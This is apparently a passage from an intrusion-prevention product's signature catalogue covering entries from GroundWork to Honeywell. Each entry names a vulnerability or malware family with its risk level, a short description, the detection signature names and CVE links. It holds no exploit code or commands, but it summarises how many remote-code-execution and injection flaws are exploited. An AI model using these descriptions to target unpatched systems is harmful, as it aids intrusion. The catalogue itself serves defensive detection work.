sgpkg-ips-1296-5242

Platform:

Generic

Software:

GroundWork Monitor Enterprise

Type:

Input Validation

Description:

A suspicious referer field in GroundWork Monitor monarch_scan -call may be related to CVE-2013-3205 vulnerability. The vulnerability allows the attacker to escalate user privilege and launch executable commands.

Situation:

Analyzer-GroundWork-Monitor-Monarch-Scan-Session-Hijack
HTTP_CSH-GroundWork-Monitor-Monarch-Scan-Ref-1

References:

CVE-2013-3502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3502

Group-Policy-Remote-Code-Execution

About this vulnerability:

A vulnerability in gpscript.exe

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003 SP2;Windows Vista SP2;Windows 2008;Windows 2008 R2;Windows 7;Windows 8;Windows 8.1;Windows 2012;Windows 2012 R2;Windows RT;Windows RT 8.1

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability exists in how Group Policy receives and applies policy data when a domain-joined system connects to a domain controller. To exploit this vulnerability, an attacker would have to convince a victim with a domain-configured system to connect to an attacker-controlled network.

Situation:

SMB-TCP_CHS-Sysvol-Share-Traffic

References:

CVE-2015-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0008

BID-72477
http://www.securityfocus.com/bid/72477

MS15-011
http://technet.microsoft.com/security/bulletin/MS15-011

Grum-Spambot

About this vulnerability:	Grum spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-270-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Grum spambot
Type:	Backdoor
Description:	Grum spambot (also known as Tedroo) is a template-based spamming engine. Grum spambot has kernel-based rootkit characteristics, and is capable of hiding its component files and legitimate windows system files.
Situation:	HTTP_CRL-Grum-Spambot

Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows

About this vulnerability:

A vulnerability in GStreamer Project GStreamer

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GStreamer

Type:

Buffer Overflow

Description:

There exists multiple heap overflow vulnerabilities in GStreamer framework library. A succesful exploit might lead to code execution.

Situation:

File-MPEG_Gstreamer-QuickTime-File-Parsing-Multiple-Heap-Overflows

References:

CVE-2009-0398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0398

BID-33405
http://www.securityfocus.com/bid/33405

Gt-Bot

About this vulnerability:	GT Bot
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	GT Bot is a IRC controlled bot.
Situation:	Generic_SS-Gt-Bot-Activity

GuildFTPd-Remote-Buffer-Overflow

About this vulnerability:

A GuildFTPd Remote Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GuildFTPd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in GuildFTPd, version 0.999.14, which allows remote attackers to cause a denial of service condition or execute arbitrary code via long arguments to the CWD and LIST commands, which triggers a heap corruption.

Situation:

FTP_CS-GuildFTPd-Remote-Buffer-Overflow

References:

CVE-2008-4572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4572

OSVDB-49045
http://www.osvdb.org/49045

GuLoader-Malware-Infection-Traffic

About this vulnerability:	GuLoader malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1271-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	GuLoader malware infection traffic was detected.
Situation:	HTTP_CS-GuLoader-Malware-Infection-Traffic

Gumblar-Bot

About this vulnerability:	Gumblar bot
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Gumblar bot is a Windows malware that can be remotely controller.
Situation:	HTTP_CS-Gumblar-Bot-Traffic HTTP_CRL-Gumblar-Bot-Traffic File-Text_Gumblar-Bot-Traffic

Gzip-Compressed-File

About this vulnerability:	gzip archive
Risk:	Low
First detected in:	sgpkg-ips-186-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	gzip
Type:	Insecure Configuration
Description:	gzip is a widely used file compression format. These compressed files may be used to import executable content into the target system.
Situation:	E-Mail_BS-Gzip-Compressed-File-Transfer HTTP_SS-Gzip-Compressed-File-Download File-Binary_Gzip-Compressed-File-With-Reserved-Flag-Bit-Set File-Binary_Gzip-Compressed-File-With-Invalid-CRC File-Binary_Gzip-Compressed-File-Upload File-Binary_Gzip-Compressed-File-Download

H0lyGh0st-Ransomware-C2-Traffic

About this vulnerability:	H0lyGh0st ransomware command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1486-5242
Last changed:	sgpkg-ips-1486-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	H0lyGh0st is a ransomware with data exfiltration and encryption capabilities.
Situation:	HTTP_CRL-H0lyGh0st-Ransomware-C2-Traffic

H2-Database-Console-Jdbcutils-JNDI-Injection

About this vulnerability:

A vulnerability in H2 Database Project H2 Database

Risk:

Moderate

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

H2 Database

Type:

Malfunction

Description:

Improper handling of JNDI data source names in requests causes a JNDI injection vulnerability in the H2 database. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-H2-Database-Console-Jdbcutils-JNDI-Injection

References:

CVE-2021-42392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42392

H2-Database-JDBC-URL-Arbitrary-Code-Execution

About this vulnerability:

A vulnerability in H2 Database Project H2 Database

Risk:

Moderate

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

H2 Database

Type:

Input Validation

Description:

Improper input validation when handling a specific JDBC URL causes a vulnerability in the H2 database. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-H2-Database-JDBC-URL-Arbitrary-Code-Execution

References:

CVE-2022-23221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23221

H2-Web-Interface-Create-Alias-RCE

About this vulnerability:	An attempt to exploit a vulnerability in H2 Database detected
Risk:	High
First detected in:	sgpkg-ips-1725-5242
Last changed:	sgpkg-ips-1725-5242
Platform:	Linux
Software:	H2 Database
Type:	Input Validation
Description:	A vulnerability in H2 Database, versions 2.1.214, 2.0.204, and 1.4.199, which allows remote attackers to execute read and write operations on the database, due to insufficient input validation of H2 SQL commands.
Situation:	HTTP_CRL-H2-Web-Interface-Create-Alias-RCE

Hadooken-Malware-Activity

About this vulnerability:	Hadooken malware activity detected
Risk:	High
First detected in:	sgpkg-ips-1780-5242
Last changed:	sgpkg-ips-1780-5242
Platform:	Generic
Software:	Hadooken Malware
Type:	Backdoor
Description:	Hadooken is a Linux malware targetting Weblogic servers. This fingerprint detects the malware's activities.
Situation:	HTTP_CSU-Hadooken-Malware-Activity

Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Haihaisoft Universal Player detected

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Windows; Mac OS; Android

Software:

Haihaisoft

Type:

Input Validation

Description:

A buffer overflow vulnerability in Haihaisoft Universal Player, versions 1.4.8.0 and possibly others, which allows remote attackers to execute arbitrary code using the ActiveX control, due to the insufficient boundary checks on user-supplied data.

Situation:

File-Text_Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow

References:

CVE-2009-4219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4219

Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection

About this vulnerability:

An attempt to exploit a Hak5 WiFi Pineapple Preconfiguration Command Injection vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Hak5

Type:

Input Validation

Description:

A vulnerability in the Hak5 WiFi Pineapple, firmware versions 2.3.0 and before, which allows remote attackers to bypass authentication and execute arbitrary commands due to predictable anti-CSRF tokens.

Situation:

HTTP_CRL-Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection

References:

CVE-2015-4624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4624

Ham-Backdoor

About this vulnerability:	Ham Backdoor
Risk:	High
First detected in:	sgpkg-ips-859-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Ham backdoor is mainly used to download additional malware on the system.
Situation:	HTTP_CRL-Ham-Backdoor-Request

Hamachi-VPN-Usage

About this vulnerability:	Hamachi VPN usage
Risk:	Moderate
First detected in:	sgpkg-ips-214-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Hamachi
Type:	Insecure Configuration
Description:	Hamachi is a zero-configuration virtual private network solution capable of establishing direct connections between computers that are behind NAT firewalls.
Situation:	Shared_TCP-CS-Hamachi-VPN-Logon

Hamweq-Bot

About this vulnerability:	Hamweq Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Hamweq is a bot that opens a backdoor on the infected machine for a remote attacker to use.
Situation:	Generic_CS-Hamweq-Bot-Traffic

Hancitor-C2-Traffic

About this vulnerability:	Hancitor C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1119-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Hancitor is a downloader trojan. It's usually spread via email attachments.
Situation:	HTTP_CRL-Hancitor-C2-Traffic

Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service

About this vulnerability:

A vulnerability in HAProxy HAProxy

Risk:

Moderate

First detected in:

sgpkg-ips-1180-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HAProxy

Type:

Infinite Loop

Description:

Incorrect handling of Cookie/Set-Cookie header values in HAproxy causes a denial of service vulnerability which an attacker can exploit to trigger an infinite loop.

Situation:

HTTP_CSH-Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service

References:

CVE-2019-14241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14241

Haproxy-Empty-Header-Name-Access-Control-Bypass

About this vulnerability:

A vulnerability in HAProxy

Risk:

High

First detected in:

sgpkg-ips-1571-5242

Last changed:

sgpkg-ips-1571-5242

Platform:

Generic

Software:

HAProxy

Type:

Input Validation

Description:

An access control bypass vulnerability has been reported in HAProxy. The vulnerability is due to improper parsing of incoming HTTP requests with empty header names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in access control bypass in HAProxy and, in the worst case, could potentially lead to HTTP request smuggling issues.

Situation:

HTTP_CSH-Haproxy-Empty-Header-Name-Access-Control-Bypass

References:

CVE-2023-25725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25725

Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in HAProxy.

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Linux; Unix

Software:

HAProxy

Type:

Integer Overflow

Description:

A vulnerability in HAProxy, multiple versions, that allows remote attackers to perform smuggling attacks by sending requests with crafted HTTP headers to a vulnerable server, due to improper checking of HTTP header names.

Situation:

HTTP_CSH-Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability

References:

CVE-2021-40346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40346

Haproxy-HTTP2-HPACK-Out-of-Bound-Write

About this vulnerability:

A vulnerability in HAProxy

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Linux

Software:

HAProxy

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in HAProxy, versions 1.8 through 2.x before 2.1.4, which allows remote attackers to execute arbitrary code by sending an HTTP2 request with crafted HPACK data, due to the improper checking of total lengths in hpack_dht_insert in hpack-tbl.c.

Situation:

HTTP_CS-Haproxy-HTTP2-HPACK-Out-of-Bound-Write
HTTP2_HPACK-Haproxy-HTTP2-HPACK-Out-of-Bound-Write

References:

CVE-2020-11100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11100

Harbor-Project-Harbor-User-API-Privilege-Escalation

About this vulnerability:

A vulnerability in Harbor

Risk:

Moderate

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Harbor

Type:

Input Validation

Description:

An API request with a crafted payload can be used to exploit a privilege escalation vulnerability in Harbor. A successful exploit will grant the attacker administrator privileges on the service.

Situation:

File-Text_Harbor-Project-Harbor-User-API-Privilege-Escalation

References:

CVE-2019-16097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097

Harbour-Networks-Routers-Information-Disclosure

About this vulnerability:	A vulnerability in Harbour Networks routers
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Harbour Networks routers
Type:	Malfunction
Description:	There is an information disclosure vulnerability in some Harbour Networks routers.
Situation:	HTTP_CSU-Harbour-Networks-Routers-Information-Disclosure

Harnig

About this vulnerability:	Harnig
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Harnig is a Botnet that is used to install additional malware on the infected machines.
Situation:	HTTP_CSU-Harnig-Activity-Detected

Hashicorp-Consul-Remote-Command-Execution

About this vulnerability:	A vulnerability in Hashicorp Consul
Risk:	High
First detected in:	sgpkg-ips-1174-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Hashicorp Consul
Type:	Input Validation
Description:	A vulnerability in Hashicorp Consul which allows remote attackers to execute arbitrary commands on Consul nodes, via the services API, due to insufficient input validation.
Situation:	HTTP_CSR-Hashicorp-Consul-Remote-Command-Execution

Hashicorp-Consul-Rexec-RCE

About this vulnerability:	A vulnerability in Hashicorp Consul
Risk:	High
First detected in:	sgpkg-ips-1197-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Hashicorp Consul
Type:	Input Validation
Description:	A vulnerability in Hashicorp Consul which allows remote attackers to execute arbitrary code through the remote code execution function _rexec.
Situation:	HTTP_CRL-Hashicorp-Consul-Rexec-RCE

Hashicorp-Nomad-Remote-Command-Execution

About this vulnerability:	A vulnerability in HashiCorp Nomad.
Risk:	High
First detected in:	sgpkg-ips-1368-5242
Last changed:	sgpkg-ips-1368-5242
Platform:	Linux; Windows
Software:	HashiCorp Nomad
Type:	Insecure Configuration
Description:	A vulnerability in HashiCorp Nomad which allows remote attackers to spawn a shell by creating batch jobs and execute arbitrary code with the raw_exec driver which is on in the default configuration.
Situation:	HTTP_CS-Hashicorp-Nomad-Remote-Command-Execution

Hastymail-Remote-Command-Execution

About this vulnerability:

A Hastymail Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Hastymail

Type:

Input Validation

Description:

A vulnerability in Hastymail, versions 2.1.1 before RC2, which allows remote attackers to execute arbitrary commands via the rs or rsargs[] parameters in a mailbox Drafts action.

Situation:

HTTP_CRL-Hastymail-Remote-Command-Execution

References:

CVE-2011-4542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4542

BID-50791
http://www.securityfocus.com/bid/50791

OSVDB-77331
http://www.osvdb.org/77331

Hauri-AntiVirus-ACE-Archive-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in HAURI AntiVirus

Risk:

High

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HAURI Antivirus

Type:

Malfunction

Description:

A buffer overflow vulnerability exists in HAURI Anti-Virus products. The flaw exists in the scanning of ACE archives containing compressed files with overly long names. A malicious user may exploit this vulnerability to bypass virus scanning, or execute arbitrary code on the affected system. In a simple attack case aimed at evading virus detection, the vulnerable program reports no detected viruses in the crafted ACE archive. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component will execute in the security context of the current logged on user.

Situation:

File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2

References:

CVE-2005-2720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2720

BID-14647
http://www.securityfocus.com/bid/14647

Header-Integer-Percent-Encoding

About this vulnerability:	Percent encoded value in HTTP headers
Risk:	Low
First detected in:	sgpkg-ips-684-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Vulnerability Scanner
Description:	Percent encoded integers in header fields are rare in normal HTTP traffic. This may indicate a logic injection attempt.
Situation:	HTTP_CSH-Header-Integer-Percent-Encoding

Headline-Portal-Engine-Php-Remote-File-Inclusion

About this vulnerability:

A vulnerability in Headline Portal Engine

Risk:

High

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Headline Portal Engine

Type:

Code Injection

Description:

There is a vulnerability in Headline Portal Engine that allows inclusion of arbitrary files, leading to code injection and execution in the context of the web server.

Situation:

HTTP_CSU-Headline-Portal-Engine-Php-Remote-File-Inclusion

References:

BID-19633
http://www.securityfocus.com/bid/19633

Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688

About this vulnerability:

An attempt to exploit a vulnerability in ksmbd detected

Risk:

High

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Linux

Software:

ksmbd

Type:

Heap Overflow

Description:

The flaw exists within the handling of file attributes in SMB kernel server ksmbd. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel.

Situation:

SMB-TCP_CHS_Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688

References:

CVE-2022-47942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47942

Heimdal-KDC-ASN1-der-Length-Denial-Of-Service

About this vulnerability:

A vulnerability in h5l.org Heimdal

Risk:

Moderate

First detected in:

sgpkg-ips-1077-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Heimdal

Type:

Malfunction

Description:

There exists a denial-of-service vulnerability in Heimdal, a Kerberos implementation. A remote, unauthenticated attacker can use this to cause the process to crash.

Situation:

Generic_UDP-Heimdal-KDC-ASN1-der-Length-Denial-Of-Service

References:

CVE-2017-17439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17439

Heloag

About this vulnerability:	Heloag
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Heloag is a Botnet. It communicates with it's botmaster and peers through P2P.
Situation:	HTTP_CSU-Heloag-Activity

Herpsnet-Bot

About this vulnerability:	HerpsNet Bot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	HerpsNet is a Botnet that is used for various malicious purposes.
Situation:	HTTP_CSH-Herpsnet-Bot-Traffic

Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection

About this vulnerability:

A vulnerability in HPE Vertica

Risk:

High

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Enterprise Vertica

Type:

Input Validation

Description:

There exists a remote command injection vulnerability in Hewlett Packard Enterprise Vertica. A remote attacker could use this to execute arbitrary commands on the system with root priviliges.

Situation:

HTTP_CRL-Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection

References:

CVE-2016-2002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2002

Hexojs-Hexo-Includecodetag-Path-Traversal

About this vulnerability:

A vulnerability in Hexojs Hexo

Risk:

Moderate

First detected in:

sgpkg-ips-1644-5242

Last changed:

sgpkg-ips-1644-5242

Platform:

Generic

Software:

Hexo

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported for Hexojs Hexo. The vulnerability is due to insufficient restriction of the path in the include_code tag plugin. A remote attacker could exploit this vulnerability by enticing the victim to add a specially crafted Markdown file to their Hexo website. Successful exploitation could result in sensitive information disclosure.

Situation:

File-Text_Hexojs-Hexo-Includecodetag-Path-Traversal

References:

CVE-2023-39584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39584

HiatusRAT-Malware-C2-Traffic

About this vulnerability:	HiatusRAT malware activity detected
Risk:	High
First detected in:	sgpkg-ips-1815-5242
Last changed:	sgpkg-ips-1815-5242
Platform:	Linux
Software:	HiatusRAT
Type:	Backdoor
Description:	Hiatus is a remote access trojan (RAT) that targets Linux systems and business-grade routers. The malware can collect system level details, including MAC addresses, kernel version, firmware version, running processes and more. The malware sends HTTP POST requests to the attacker to track the status of each compromised router. This fingerprint detects such tracking requests.
Situation:	HTTP_CSU-HiatusRAT-Malware-C2-Traffic

HIDDEN-COBRA

About this vulnerability:	Traffic pattern associated with HIDDEN COBRA
Risk:	High
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This vulnerability refers to a number of situations that detect traffic patterns associated with HIDDEN COBRA. HIDDEN COBRA is the U.S Government assignated name for malicious cyber activity by North Korean government.
Situation:	HTTP_CS-HIDDEN-COBRA-Beacon-COPPERHEDGE HTTPS_CS-Suspected-HIDDEN-COBRA-Malicious-SSL-Traffic File-Exe_HIDDEN-COBRA-Executable-PEBBLEDASH File-Exe_HIDDEN-COBRA-Executable-TAINTEDSCRIBE File-Exe_HIDDEN-COBRA-Executable-COPPERHEDGE

Hiddentear-Worm-Infection-Traffic

About this vulnerability:	Hiddentear worm infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Hiddentear worm infection traffic was detected.
Situation:	Generic_CS-Hiddentear-Worm-Infection-Traffic

Hikvision-Command-Injection-CVE-2021-36260

About this vulnerability:

An attempt to exploit a vulnerability in Hikvision detected

Risk:

High

First detected in:

sgpkg-ips-1412-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

Hikvision

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the web server component of multiple Hikvision products.

Situation:

File-Text_Hikvision-Command-Injection-CVE-2021-36260
File-TextId_Hikvision-Command-Injection-CVE-2021-36260

References:

CVE-2021-36260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260

Hikvision-DVR-Buffer-Overflow

About this vulnerability:

A Hikvision DVR Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-698-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Hikvision DVR

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Hikvision DVR, firmware version 2.2.10 build 131009, which allows remote attackers to execute arbitrary code with a long Authorization header via an RTSP PLAY request.

Situation:

Generic_CS-Hikvision-DVR-Buffer-Overflow

References:

CVE-2014-4880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4880

Hikvision-IP-Camera-Unauthenticated-Password-Change

About this vulnerability:

A vulnerability in Hikvision IP Cameras.

Risk:

High

First detected in:

sgpkg-ips-1508-5242

Last changed:

sgpkg-ips-1508-5242

Platform:

Generic

Software:

Hikvision

Type:

Malfunction

Description:

A vulnerability in Hikvision IP cameras, multiple verions, that allow remote attackers to gain full access to the target device, due to improper authentication logic which allows unauthenticated impersonation of any configured user account.

Situation:

HTTP_CSU-Hikvision-IP-Camera-Unauthenticated-Password-Change

References:

CVE-2017-7921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7921

Hiloti

About this vulnerability:	Hiloti
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Hiloti is a bot that downloads other malware on the infected machine.
Situation:	HTTP_CSU-Hiloti-Activity

HNS-Botnet-C2-Traffic

About this vulnerability:	Hide and Seek botnet C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1173-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Hide and Seek is a peer-to-peer botnet targeting IOT devices.
Situation:	Generic_UDP-HNS-Botnet-C2-Traffic

Home-Router-UPnP-Flash-Vulnerability

About this vulnerability:	Home Router UPnP Flash Vulnerability
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	UPnP
Type:	Malfunction
Description:	A vulnerability exists in UPnP.
Situation:	HTTP_CSH-Home-Router-UPnP-Flash-Vulnerability

HomeMatic-CCU2-RCE

About this vulnerability:

A vulnerability in HomeMatic CCU2

Risk:

High

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

HomeMatic

Type:

Insecure Configuration

Description:

There exists a vulnerability in HomeMatic CCU2 home automation systems, versions 2.29.2 and earlier, which allows remote attackers to obtain read and write access and execute system commands.

Situation:

HTTP_CRL-HomeMatic-CCU2-RCE

References:

CVE-2018-7297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7297

Honeywell-ActiveX-Control-Code-Execution

About this vulnerability:

Honeywell ActiveX control code execution.

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Honeywell RemoteDeploy

Type:

Insecure Configuration

Description:

An ActiveX control, HscRemoteDeploy.dll, vulnerability in Honeywell RemoteDeploy that allows a remote attacker to run commands on the target client via a crafted HTML document.

Situation:

File-Text_Honeywell-ActiveX-Control-Code-Execution

References:

CVE-2013-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0108

Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution

About this vulnerability:

A vulnerability in Honeywell ComfortPoint Open Manager

Risk:

Moderate

First detected in:

sgpkg-ips-813-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Honeywell ComfortPoint Open Manager; Honeywell Enterprise Buildings Integrator; Honeywell SymmetrE

Type:

Malfunction

Description:

There is a code execution vulnerability in Honeywell HscRemoteDeploy.dll ActiveX Control. The vulnerability is due a failure to validate user input that can lead to the execution of an arbitrary HTA application. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. Successful exploitation will result in arbitrary code execution in the context of the affected application.

Situation:

File-Text_Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution

References:

CVE-2013-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0108

BID-58134
http://www.securityfocus.com/bid/58134

OSVDB-90583
http://www.osvdb.org/90583

Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Honeywell OPOS Suite

Risk:

Moderate

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Honeywell OPOS Suite

Type:

Malfunction

Description:

A buffer overflow vulnerability has been reported in Honeywell OPOS Suite. The vulnerability is due to improper bounds checking while processing the Open method calls within the HWOPOSScale.ocx ActiveX control. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. This can result in arbitrary code execution in the context of the current logged on user.

Situation:

File-Text_Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow

References:

CVE-2014-8269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8269

OSVDB-115784
http://www.osvdb.org/115784

Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Honeywell OPOS Suite

Risk:

Moderate

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Honeywell OPOS Suite

Type:

Malfunction

Description:

A buffer overflow vulnerability has been reported in Honeywell OPOS Suite. The vulnerability is due to improper bounds checking while processing the Open method calls within the HWOPOSSCANNER.ocx ActiveX control. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. This can result in arbitrary code execution in the context of the current logged on user.

Situation:

File-Text_Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow

References:

CVE-2014-8269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8269

OSVDB-115785
http://www.osvdb.org/115785

Honeywell-UniSim-ShadowPlant-Bridge-DoS

About this vulnerability:	A vulnerability in Honeywell UniSim ShadowPlant Bridge
Risk:	Moderate
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Honeywell UniSim
Type:	Malfunction
Description:	There is a denial of service vulnerability in Honeywell UniSim ShadowPlant Bridge
Situation:	Generic_CS-Honeywell-UniSim-ShadowPlant-Bridge-DoS
